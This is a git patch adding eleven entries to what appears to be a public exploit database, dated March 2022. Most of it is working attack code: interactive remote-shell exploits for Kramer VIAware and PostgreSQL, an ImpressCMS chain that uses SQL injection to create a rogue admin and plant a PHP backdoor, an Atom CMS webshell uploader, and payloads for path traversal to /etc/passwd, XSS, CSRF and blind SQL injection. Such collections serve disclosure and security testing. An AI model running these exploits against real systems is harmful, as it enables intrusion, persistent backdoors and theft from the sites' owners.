From 54b7907ae60a88d674d975798b771129321db753 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 31 Mar 2022 05:01:38 +0000 Subject: [PATCH] DB: 2022-03-31 11 changes to exploits/shellcodes PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated) Kramer VIAware 2.5.0719.1034 - Remote Code Execution (RCE) ImpressCMS 1.4.2 - Remote Code Execution (RCE) Atom CMS 2.0 - Remote Code Execution (RCE) Drupal avatar_uploader v7.x-1.0-beta8 - Cross Site Scripting (XSS) WordPress Plugin Curtain 1.0.2 - Cross-site Request Forgery (CSRF) WordPress Plugin cab-fare-calculator 1.0.3 - Local File Inclusion WordPress Plugin video-synchro-pdf 1.7.4 - Local File Inclusion WordPress Plugin admin-word-count-column 2.2 - Local File Read CSZ CMS 1.2.9 - 'Multiple' Blind SQLi(Authenticated) WordPress Plugin Easy Cookie Policy 1.6.2 - Broken Access Control to Stored XSS --- exploits/hardware/remote/50848.py | 111 +++++++++++++++++ exploits/multiple/remote/50847.py | 113 ++++++++++++++++++ exploits/php/webapps/50839.php | 191 ++++++++++++++++++++++++++++++ exploits/php/webapps/50840.py | 110 +++++++++++++++++ exploits/php/webapps/50841.txt | 13 ++ exploits/php/webapps/50842.txt | 29 +++++ exploits/php/webapps/50843.txt | 32 +++++ exploits/php/webapps/50844.txt | 27 +++++ exploits/php/webapps/50845.txt | 31 +++++ exploits/php/webapps/50846.txt | 25 ++++ exploits/php/webapps/50849.txt | 27 +++++ files_exploits.csv | 11 ++ 12 files changed, 720 insertions(+) create mode 100755 exploits/hardware/remote/50848.py create mode 100755 exploits/multiple/remote/50847.py create mode 100644 exploits/php/webapps/50839.php create mode 100755 exploits/php/webapps/50840.py create mode 100644 exploits/php/webapps/50841.txt create mode 100644 exploits/php/webapps/50842.txt create mode 100644 exploits/php/webapps/50843.txt create mode 100644 exploits/php/webapps/50844.txt create mode 100644 exploits/php/webapps/50845.txt create mode 100644 exploits/php/webapps/50846.txt create mode 100644 exploits/php/webapps/50849.txt diff --git a/exploits/hardware/remote/50848.py b/exploits/hardware/remote/50848.py new file mode 100755 index 000000000..510d6ae2c --- /dev/null +++ b/exploits/hardware/remote/50848.py @@ -0,0 +1,111 @@ +# Exploit Title: Kramer VIAware 2.5.0719.1034 - Remote Code Execution (RCE) +# Date: 28/03/2022 +# Exploit Author: sharkmoos & BallO +# Vendor Homepage: https://www.kramerav.com/ +# Software Link: https://www.kramerav.com/us/product/viaware +# Version: 2.5.0719.1034 +# Tested on: ViaWare Go (Windows 10) +# CVE : CVE-2019-17124 + +import requests, sys, urllib3 +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +def adminLogin(s, host, username, password): + headers = { + "Host": f"{host}", + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", + "Accept-Language": "en-GB,en;q=0.5", + "Accept-Encoding": "gzip, deflate", + "Content-Type": "application/x-www-form-urlencoded", + "Origin": f"https://{host}", + "Referer": f"https://{host}/admin/login.php", + "Upgrade-Insecure-Requests": "1", + "Sec-Fetch-Dest": "document", + "Sec-Fetch-Mode": "navigate", + "Sec-Fetch-Site": "same-origin", + "Sec-Fetch-User": "?1", + "Sec-Gpc": "1", + "Te": "trailers", + "Connection": "close" + } + data = { + "txtUserId": username, + "txtPwd": password, + "btnOk" :"Login" + } + response = s.post(f"https://{host}/admin/login.php", verify=False) + if len(s.cookies) < 1: + return False + else: + return True + + +def writeCommand(session, host, command): + headers = { + "Host": f"{host}", + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0", + "Accept": "text/html, */*", + "Accept-Language": "en-GB,en;q=0.5", + "Accept-Encoding": "gzip, deflate", + "Content-Type": "application/x-www-form-urlencoded", + "X-Requested-With": "XMLHttpRequest", + "Origin": f"https://{host}", + "Referer": f"https://{host}/browseSystemFiles.php?path=C:\Windows&icon=browser", + "Sec-Fetch-Dest": "empty", + "Sec-Fetch-Mode": "cors", + "Sec-Fetch-Site": "same-origin", + "Sec-Gpc": "1", + "Te": "trailers", + "Connection": "close" + } + data = { + "radioBtnVal":f"{command}", + "associateFileName": "C:/tc/httpd/cgi-bin/exploit.cmd" + } + session.post(f"https://{host}/ajaxPages/writeBrowseFilePathAjax.php", headers=headers, data=data) + + +def getResult(session, host): + file = session.get(f"https://{host}/cgi-bin/exploit.cmd", verify=False) + pageText = file.text + if len(pageText) < 1: + result = "Command did not return a result" + else: + result = pageText + return result + + + +def main(host, username="su", password="supass"): + s = requests.Session() + # comment this line to skip the login stage + loggedIn = adminLogin(s, host, username, password) + + if not loggedIn: + print("Could not successfully login as the admin") + sys.exit(1) + else: + pass + + command = "" + while command != "exit": + command = input("cmd:> ").strip() + writeCommand(s, host, command) + print(getResult(s, host)) + exit() + +if __name__ == "__main__": + + args = sys.argv + numArgs = len(args) + if numArgs < 2: + print(f"Run script in format:\n\n\tpython3 {args[0]} target\n") + print(f"[Optional] Provide Admin Credentials\n\n\tpython3 {args[0]} target su supass") + if numArgs == 2: + main(args[1]) + if numArgs == 4: + main(args[1], args[2], args[3]) + if numArgs > 4: + print(f"Run script in format:\n\n\tpython3 {args[0]} target\n") + print(f"[Optional] Provide Admin Credentials\n\n\tpython3 {args[0]} target su supass") \ No newline at end of file diff --git a/exploits/multiple/remote/50847.py b/exploits/multiple/remote/50847.py new file mode 100755 index 000000000..c2c13f4f1 --- /dev/null +++ b/exploits/multiple/remote/50847.py @@ -0,0 +1,113 @@ +# Exploit Title: PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated) +# Date: 2022-03-29 +# Exploit Author: b4keSn4ke +# Github: https://github.com/b4keSn4ke +# Vendor Homepage: https://www.postgresql.org/ +# Software Link: https://www.postgresql.org/download/linux/debian/ +# Version: 9.3 - 11.7 +# Tested on: Linux x86-64 - Debian 4.19 +# CVE: CVE-2019–9193 + +#!/usr/bin/python3 + +import psycopg2 +import argparse +import hashlib +import time + +def parseArgs(): + parser = argparse.ArgumentParser(description='CVE-2019–9193 - PostgreSQL 9.3-11.7 Authenticated Remote Code Execution') + parser.add_argument('-i', '--ip', nargs='?', type=str, default='127.0.0.1', help='The IP address of the PostgreSQL DB [Default: 127.0.0.1]') + parser.add_argument('-p', '--port', nargs='?', type=int, default=5432, help='The port of the PostgreSQL DB [Default: 5432]') + parser.add_argument('-d', '--database', nargs='?', default='template1', help='Name of the PostgreSQL DB [Default: template1]') + parser.add_argument('-c', '--command', nargs='?', help='System command to run') + parser.add_argument('-t', '--timeout', nargs='?', type=int, default=10, help='Connection timeout in seconds [Default: 10 (seconds)]') + parser.add_argument('-U', '--user', nargs='?', default='postgres', help='Username to use to connect to the PostgreSQL DB [Default: postgres]') + parser.add_argument('-P', '--password', nargs='?', default='postgres', help='Password to use to connect to the the PostgreSQL DB [Default: postgres]') + args = parser.parse_args() + return args + +def main(): + try: + print ("\r\n[+] Connecting to PostgreSQL Database on {0}:{1}".format(args.ip, args.port)) + connection = psycopg2.connect ( + database=args.database, + user=args.user, + password=args.password, + host=args.ip, + port=args.port, + connect_timeout=args.timeout + ) + print ("[+] Connection to Database established") + + print ("[+] Checking PostgreSQL version") + checkVersion(connection) + + if(args.command): + exploit(connection) + else: + print ("[+] Add the argument -c [COMMAND] to execute a system command") + + except psycopg2.OperationalError as e: + print ("\r\n[-] Connection to Database failed: \r\n{0}".format(e)) + exit() + +def checkVersion(connection): + cursor = connection.cursor() + cursor.execute("SELECT version()") + record = cursor.fetchall() + cursor.close() + + result = deserialize(record) + version = float(result[(result.find("PostgreSQL")+11):(result.find("PostgreSQL")+11)+4]) + + if (version >= 9.3 and version <= 11.7): + print("[+] PostgreSQL {0} is likely vulnerable".format(version)) + + else: + print("[-] PostgreSQL {0} is not vulnerable".format(version)) + exit() + +def deserialize(record): + result = "" + for rec in record: + result += rec[0]+"\r\n" + return result + +def randomizeTableName(): + return ("_" + hashlib.md5(time.ctime().encode('utf-8')).hexdigest()) + +def exploit(connection): + cursor = connection.cursor() + tableName = randomizeTableName() + try: + print ("[+] Creating table {0}".format(tableName)) + cursor.execute("DROP TABLE IF EXISTS {1};\ + CREATE TABLE {1}(cmd_output text);\ + COPY {1} FROM PROGRAM '{0}';\ + SELECT * FROM {1};".format(args.command,tableName)) + + print ("[+] Command executed\r\n") + + record = cursor.fetchall() + result = deserialize(record) + + print(result) + print ("[+] Deleting table {0}\r\n".format(tableName)) + + cursor.execute("DROP TABLE {0};".format(tableName)) + cursor.close() + + except psycopg2.errors.ExternalRoutineException as e: + print ("[-] Command failed : {0}".format(e.pgerror)) + print ("[+] Deleting table {0}\r\n".format(tableName)) + cursor = connection.cursor() + cursor.execute("DROP TABLE {0};".format(tableName)) + cursor.close() + + finally: + exit() + +if __name__ == "__main__": + args = parseArgs() + main() \ No newline at end of file diff --git a/exploits/php/webapps/50839.php b/exploits/php/webapps/50839.php new file mode 100644 index 000000000..7c6a8ce97 --- /dev/null +++ b/exploits/php/webapps/50839.php @@ -0,0 +1,191 @@ +# Exploit Title: ImpressCMS 1.4.2 - Remote Code Execution (RCE) +# Exploit Author: Egidio Romano aka EgiX +# Date: 30/03/2022 +# Version: <= 1.4.2 +# Venor: https://www.impresscms.org +# CVE: CVE-2021-26599 + +"; + print "\nExample.: php $argv[0] http://localhost/impresscms/"; + print "\nExample.: php $argv[0] https://www.impresscms.org/\n\n"; + die(); +} + +$url = $argv[1]; +$ch = curl_init(); + +curl_setopt($ch, CURLOPT_HEADER, true); +curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); +curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); + +print "\n[+] Retrieving security token (CVE-2021-26598)\n"; + +curl_setopt($ch, CURLOPT_URL, "{$url}misc.php?action=showpopups&type=friend"); + +$res = curl_exec($ch); + +if (!preg_match("/(cookie: [^;]+); path/i", $res, $sid)) die("[-] Session coookie not found!\n"); +if (!preg_match("/TOKEN_REQUEST' value='([^']+)'/", $res, $token)) die("[-] Token not found!\n"); + +print "[+] Starting SQL Injection attack (CVE-2021-26599)\n"; +print "[*] Step 1: retrieving database name\n"; + +curl_setopt($ch, CURLOPT_URL, "{$url}include/findusers.php"); +curl_setopt($ch, CURLOPT_HTTPHEADER, [$sid[1]]); + +$params = "user_submit=1&token={$token[1]}&groups[]=%s"; + +$min = true; +$idx = 1; + +while(1) +{ + $test = 256; + + for ($i = 7; $i >= 0; $i--) + { + $test = $min ? ($test - pow(2, $i)) : ($test + pow(2, $i)); + $sql = "1) AND ORD(SUBSTR(DATABASE(),{$idx},1))<{$test}#"; + curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql))); + $min = !preg_match("/No Users Found/", curl_exec($ch)); + } + + if (($chr = $min ? ($test - 1) : ($test)) == 0) break; + $dbname .= chr($chr); $min = true; $idx++; + print "\r[+] DB name: {$dbname}"; +} + +print "\n[*] Step 2: retrieving tables prefix\n"; + +$sub = "SELECT TRIM(TRAILING 'users' FROM table_name) FROM information_schema.tables WHERE table_schema='{$dbname}' AND table_name LIKE '%users'"; +$min = true; +$idx = 1; + +while(1) +{ + $test = 256; + + for ($i = 7; $i >= 0; $i--) + { + $test = $min ? ($test - pow(2, $i)) : ($test + pow(2, $i)); + $sql = hex_enc("SELECT IF(ORD(SUBSTR(({$sub}),{$idx},1))<{$test},1,SLEEP(1))"); + $sql = "0); SET @q = {$sql}; PREPARE stmt FROM @q; EXECUTE stmt;#"; + curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql))); + $start = time(); curl_exec($ch); $secs = time() - $start; + $min = ($secs < 2); + } + + if (($chr = $min ? ($test - 1) : ($test)) == 0) break; + $prefix .= chr($chr); $min = true; $idx++; + print "\r[+] Prefix: {$prefix}"; +} + +print "\n[*] Step 3: creating new admin user\n"; + +$uid = time(); +$enc = hex_enc("egix"); +$pwd = hex_enc(md5("egix")); +$sql = "0); INSERT INTO {$prefix}users (uid, uname, login_name, pass, level, enc_type) VALUES ({$uid}, {$enc}, {$enc}, {$pwd}, 5, 0)#"; + +curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql))); +curl_exec($ch); + +$sql = "0); INSERT INTO {$prefix}groups_users_link (groupid, uid) VALUES (1, {$uid})#"; + +curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql))); +curl_exec($ch); + +print "[+] Trying to login as the new user\n"; + +curl_setopt($ch, CURLOPT_URL, "{$url}user.php"); +curl_setopt($ch, CURLOPT_POSTFIELDS, "uname=egix&pass=egix&op=login"); + +if (!preg_match("/(cookie: [^;]+); path/i", curl_exec($ch), $sid)) die("[-] Login failed!\n"); + +print "[+] Creating malicious autotask\n"; + +$phpcode = urlencode("if (isset(\$_SERVER[HTTP_CMD])) { print(____); passthru(base64_decode(\$_SERVER[HTTP_CMD])); die; }"); + +curl_setopt($ch, CURLOPT_URL, "{$url}modules/system/admin.php"); +curl_setopt($ch, CURLOPT_HTTPHEADER, [$sid[1], "Referer: {$url}"]); +curl_setopt($ch, CURLOPT_POSTFIELDS, "fct=autotasks&sat_name=rce&sat_code={$phpcode}&sat_enabled=1&op=addautotasks"); + +if (!preg_match("/HTTP.*302/i", curl_exec($ch))) die("[-] Something went wrong!\n"); + +print "[+] Launching shell\n"; + +curl_setopt($ch, CURLOPT_URL, $url); +curl_setopt($ch, CURLOPT_POST, false); + +while(1) +{ + print "\nimpresscms-shell# "; + if (($cmd = trim(fgets(STDIN))) == "exit") break; + curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".base64_encode($cmd)]); + preg_match('/____(.*)/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); +} \ No newline at end of file diff --git a/exploits/php/webapps/50840.py b/exploits/php/webapps/50840.py new file mode 100755 index 000000000..7becb4e0e --- /dev/null +++ b/exploits/php/webapps/50840.py @@ -0,0 +1,110 @@ +# Exploit Title: Atom CMS 2.0 - Remote Code Execution (RCE) +# Date: 22.03.2022 +# Exploit Author: Ashish Koli (Shikari) +# Vendor Homepage: https://thedigitalcraft.com/ +# Software Link: https://github.com/thedigicraft/Atom.CMS +# Version: 2.0 +# Tested on: Ubuntu 20.04.3 LTS +# CVE: CVE-2022-25487 + +# Description +This script uploads webshell.php to the Atom CMS. An application will store that file in the uploads directory with a unique number which allows us to access Webshell. + +# Usage : python3 exploit.py +# Example: python3 exploit.py 127.0.0.1 80 /atom + +# POC Exploit: https://youtu.be/qQrq-eEpswc +# Note: Crafted "Shell.txt" file is required for exploitation which is available on the below link: +# https://github.com/shikari00007/Atom-CMS-2.0---File-Upload-Remote-Code-Execution-Un-Authenticated-POC + +''' +Description: +A file upload functionality in Atom CMS 2.0 allows any +non-privileged user to gain access to the host through the uploaded files, +which may result in remote code execution. +''' + +#!/usr/bin/python3 +''' +Import required modules: +''' +import sys +import requests +import json +import time +import urllib.parse +import struct +import re +import string +import linecache + + + +proxies = { + 'http': 'http://localhost:8080', + 'https': 'https://localhost:8080', +} + +''' +User Input: +''' +target_ip = sys.argv[1] +target_port = sys.argv[2] +atomcmspath = sys.argv[3] + + +''' +Get cookie +''' +session = requests.Session() +link = 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin' +response = session.get(link) +cookies_session = session.cookies.get_dict() +cookie = json.dumps(cookies_session) +cookie = cookie.replace('"}','') +cookie = cookie.replace('{"', '') +cookie = cookie.replace('"', '') +cookie = cookie.replace(" ", '') +cookie = cookie.replace(":", '=') + +''' +Upload Webshell: +''' +# Construct Header: +header1 = { + 'Host': target_ip, + 'Accept': 'application/json', + 'Cache-Control': 'no-cache', + 'X-Requested-With': 'XMLHttpRequest', + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36', + 'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryH7Ak5WhirAIQ8o1L', + 'Origin': 'http://' + target_ip, + 'Referer': 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin/index.php?page=users&id=1', + 'Accept-Encoding': 'gzip, deflate', + 'Accept-Language': 'en-US,en;q=0.9', + 'Cookie': cookie, + 'Connection': 'close', + +} + + +# loading Webshell payload: +path = 'shell.txt' +fp = open(path,'rb') +data= fp.read() + + +# Uploading Webshell: +link_upload = 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin/uploads.php?id=1' +upload = requests.post(link_upload, headers=header1, data=data) + +p=upload.text +x = re.sub("\s", "\n", p) +y = x.replace("1
Unknown", "null") +z = re.sub('[^0-9]', '', y) + +''' +Finish: +''' +print('Uploaded Webshell to: http://' + target_ip + ':' + target_port + atomcmspath + '/uploads/' + z + '.php') +print('') \ No newline at end of file diff --git a/exploits/php/webapps/50841.txt b/exploits/php/webapps/50841.txt new file mode 100644 index 000000000..c702534a4 --- /dev/null +++ b/exploits/php/webapps/50841.txt @@ -0,0 +1,13 @@ +# Exploit Title: Drupal avatar_uploader v7.x-1.0-beta8 - Cross Site Scripting (XSS) +# Date: 2022-03-22 +# Author: Milad karimi +# Software Link: https://www.drupal.org/project/avatar_uploader +# Version: v7.x-1.0-beta8 +# Tested on: Windows 10 +# CVE: N/A + +1. Description: +This plugin creates a avatar_uploader from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting. + +2. Proof of Concept: +http://$target/avatar_uploader.pages.inc?file= \ No newline at end of file diff --git a/exploits/php/webapps/50842.txt b/exploits/php/webapps/50842.txt new file mode 100644 index 000000000..6386f74fd --- /dev/null +++ b/exploits/php/webapps/50842.txt @@ -0,0 +1,29 @@ +# Exploit Title: WordPress Plugin Curtain 1.0.2 - Cross-site Request Forgery (CSRF) +# Date: 24-03-2022 +# Exploit Author: Hassan Khan Yusufzai - Splint3r7 +# Vendor Homepage: https://wordpress.org/plugins/curtain/ +# Version: 1.0.2 +# Tested on: Firefox + +## Summary: + +Cross site forgery vulnerability has been identified in curtain WordPress plugin that allows an attacker to to activate or deactivate sites maintenance mode. + +## Vulnerable URL: + +http://localhost:10003/wp-admin/options-general.php?page=curtain&_wpnonce=&mode=0 + +## CSRF POC Exploit + +``` + + +
+ + + + +
+ + +``` \ No newline at end of file diff --git a/exploits/php/webapps/50843.txt b/exploits/php/webapps/50843.txt new file mode 100644 index 000000000..1676fce48 --- /dev/null +++ b/exploits/php/webapps/50843.txt @@ -0,0 +1,32 @@ +# Exploit Title: WordPress Plugin cab-fare-calculator 1.0.3 - Local File Inclusion +# Google Dork: inurl:/wp-content/plugins/cab-fare-calculator/ +# Date: 24-03-2022 +# Exploit Author: Hassan Khan Yusufzai - Splint3r7 +# Vendor Homepage: https://wordpress.org/plugins/cab-fare-calculator/ +# Version: 1.0.3 +# Tested on: Firefox +# Vulnerable File: tblight.php + +# Impact: + +Local File Read / Code Execution + +# Vulnerable Code: + +``` +if(!empty($_GET['controller']) && !empty($_GET['action']) && +!empty($_GET['ajax']) && $_GET['ajax'] == 1) +{ + require_once('' . 'controllers/'.$_GET['controller'].'.php'); +} +``` + +# Proof of concept: + +http://localhost:10003/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/index&action=1&ajax=1 + +# POC Code Execution: + +/etc/index.php: + + \ No newline at end of file diff --git a/exploits/php/webapps/50844.txt b/exploits/php/webapps/50844.txt new file mode 100644 index 000000000..3a9e6337e --- /dev/null +++ b/exploits/php/webapps/50844.txt @@ -0,0 +1,27 @@ +# Exploit Title: WordPress Plugin video-synchro-pdf 1.7.4 - Local File Inclusion +# Google Dork: inurl:/wp-content/plugins/video-synchro-pdf/ +# Date: 26-03-2022 +# Exploit Author: Hassan Khan Yusufzai - Splint3r7 +# Vendor Homepage: https://wordpress.org/plugins/video-synchro-pdf/ +# Version: 1.7.4 +# Tested on: Firefox + +# Vulnerable File: video-synchro-pdf/reglages/Menu_Plugins/tout.php + +# Vulnerable Code: + +``` +[LFI] + +Contents of index.php: \ No newline at end of file diff --git a/exploits/php/webapps/50845.txt b/exploits/php/webapps/50845.txt new file mode 100644 index 000000000..149b1ec17 --- /dev/null +++ b/exploits/php/webapps/50845.txt @@ -0,0 +1,31 @@ +# Exploit Title: WordPress Plugin admin-word-count-column 2.2 - Local File Read +# Google Dork: inurl:/wp-content/plugins/admin-word-count-column/ +# Date: 27-03-2022 +# Exploit Author: Hassan Khan Yusufzai - Splint3r7 +# Vendor Homepage: https://wordpress.org/plugins/admin-word-count-column/ +# Version: 2.2 +# Contact me: h [at] spidersilk.com + +# PHP version: 5.3.2 or below + +# Vulnerable File: plugins/admin-word-count-column/download-csv.php + +# Vulnerable Code: + +``` + +``` + +# Proof of Concept: + +localhost/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0 + +Note: Null byte injection will only working in php 5.3.2 and below 5.3.2. \ No newline at end of file diff --git a/exploits/php/webapps/50846.txt b/exploits/php/webapps/50846.txt new file mode 100644 index 000000000..d3d27ab42 --- /dev/null +++ b/exploits/php/webapps/50846.txt @@ -0,0 +1,25 @@ +# Exploit Title: CSZ CMS 1.2.9 - 'Multiple' Blind SQLi(Authenticated) +# Date: 2021-04-14 +# Exploit Author: Rahad Chowdhury +# Vendor Homepage: https://www.cszcms.com/ +# Software Link: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.2.9.zip +# Version: 1.2.9 +# Tested on: Windows 10, Kali Linux, PHP 7.4.16, Apache 2.4.46 +# CVE: CVE-2021-43701 + +*Steps to Reproduce:* +1. First login to your Admin Panel +2. then go to "General Menu > CSV Export / Import". +3. open burp site and configure with browser. +4. then select any "Table Name" > Select "Fields Select" and Select "Sort by" +5. Now click "Export to CSV" and intercept with burp suite +6. "fieldS[]" or "orderby" parameter is vulnerable. Let's try to inject Blind SQL Injection using this query "(select(0)from(select(sleep(10)))a)" in "orderby" parameter. + +*Proof of Concept:* +http://127.0.0.1/CSZCMS/admin/export/getcsv/article_db?fieldS%5B%5D=article_db_id&orderby=(select(0)from(select(sleep(10)))a)&sort=ASC&submit=Export+to+CSV + +*Output:* +By issuing sleep(0) response will be delayed to 0 seconds. +By issuing sleep(1) response will be delayed to 1 seconds. +By issuing sleep(5) response will be delayed to 5 seconds. +By issuing sleep(10) response will be delayed to 10 seconds \ No newline at end of file diff --git a/exploits/php/webapps/50849.txt b/exploits/php/webapps/50849.txt new file mode 100644 index 000000000..be8555b43 --- /dev/null +++ b/exploits/php/webapps/50849.txt @@ -0,0 +1,27 @@ +# Exploit Title: WordPress Plugin Easy Cookie Policy 1.6.2 - Broken Access Control to Stored XSS +# Date: 2/27/2021 +# Author: 0xB9 +# Software Link: https://wordpress.org/plugins/easy-cookies-policy/ +# Version: 1.6.2 +# Tested on: Windows 10 +# CVE: CVE-2021-24405 + +1. Description: +Broken access control allows any authenticated user to change the cookie banner through a POST request to admin-ajax.php. +If users can't register, this can be done through CSRF. + +2. Proof of Concept: +POST http://localhost/wp-admin/admin-ajax.php HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 +Accept: application/json, text/javascript, /; q=0.01 +Accept-Language: en-US,en;q=0.5 +Referer: http://localhost/wp-admin/options-general.php?page=easy-cookies-policy +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 226 +Origin: http://localhost +Connection: keep-alive +Host: localhost +Cookie: [Any authenticated user] + +action=easy_cookies_policy_save_settings&maintext=&background=black&transparency=90&close=accept&expires=365&enabled=true&display=fixed&position=top&button_text=Accept&text_color=#dddddd \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 8b9b8a9aa..208e15cac 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -18656,6 +18656,8 @@ id,file,description,date,author,type,platform,port 50833,exploits/multiple/remote/50833.txt,"Ivanti Endpoint Manager 4.6 - Remote Code Execution (RCE)",1970-01-01,d7x,remote,multiple, 50835,exploits/hardware/remote/50835.txt,"ICT Protege GX/WX 2.08 - Stored Cross-Site Scripting (XSS)",1970-01-01,LiquidWorm,remote,hardware, 50836,exploits/hardware/remote/50836.txt,"ICT Protege GX/WX 2.08 - Client-Side SHA1 Password Hash Disclosure",1970-01-01,LiquidWorm,remote,hardware, +50847,exploits/multiple/remote/50847.py,"PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,b4keSn4ke,remote,multiple, +50848,exploits/hardware/remote/50848.py,"Kramer VIAware 2.5.0719.1034 - Remote Code Execution (RCE)",1970-01-01,sharkmoos,remote,hardware, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php, @@ -44906,3 +44908,12 @@ id,file,description,date,author,type,platform,port 50828,exploits/php/webapps/50828.sh,"Tiny File Manager 2.4.6 - Remote Code Execution (RCE)",1970-01-01,"FEBIN MON SAJI",webapps,php, 50830,exploits/php/webapps/50830.txt,"Wordpress Plugin iQ Block Country 1.2.13 - Arbitrary File Deletion via Zip Slip (Authenticated)",1970-01-01,"Ceylan BOZOĞULLARINDAN",webapps,php, 50838,exploits/php/webapps/50838.txt,"WordPress Plugin amministrazione-aperta 3.7.3 - Local File Read - Unauthenticated",1970-01-01,"Hassan Khan Yusufzai",webapps,php, +50839,exploits/php/webapps/50839.php,"ImpressCMS 1.4.2 - Remote Code Execution (RCE)",1970-01-01,"Egidio Romano",webapps,php, +50840,exploits/php/webapps/50840.py,"Atom CMS 2.0 - Remote Code Execution (RCE)",1970-01-01,"Ashish Koli",webapps,php, +50841,exploits/php/webapps/50841.txt,"Drupal avatar_uploader v7.x-1.0-beta8 - Cross Site Scripting (XSS)",1970-01-01,"Milad karimi",webapps,php, +50842,exploits/php/webapps/50842.txt,"WordPress Plugin Curtain 1.0.2 - Cross-site Request Forgery (CSRF)",1970-01-01,"Hassan Khan Yusufzai",webapps,php, +50843,exploits/php/webapps/50843.txt,"WordPress Plugin cab-fare-calculator 1.0.3 - Local File Inclusion",1970-01-01,"Hassan Khan Yusufzai",webapps,php, +50844,exploits/php/webapps/50844.txt,"WordPress Plugin video-synchro-pdf 1.7.4 - Local File Inclusion",1970-01-01,"Hassan Khan Yusufzai",webapps,php, +50845,exploits/php/webapps/50845.txt,"WordPress Plugin admin-word-count-column 2.2 - Local File Read",1970-01-01,"Hassan Khan Yusufzai",webapps,php, +50846,exploits/php/webapps/50846.txt,"CSZ CMS 1.2.9 - 'Multiple' Blind SQLi(Authenticated)",1970-01-01,"Rahad Chowdhury",webapps,php, +50849,exploits/php/webapps/50849.txt,"WordPress Plugin Easy Cookie Policy 1.6.2 - Broken Access Control to Stored XSS",1970-01-01,0xB9,webapps,php,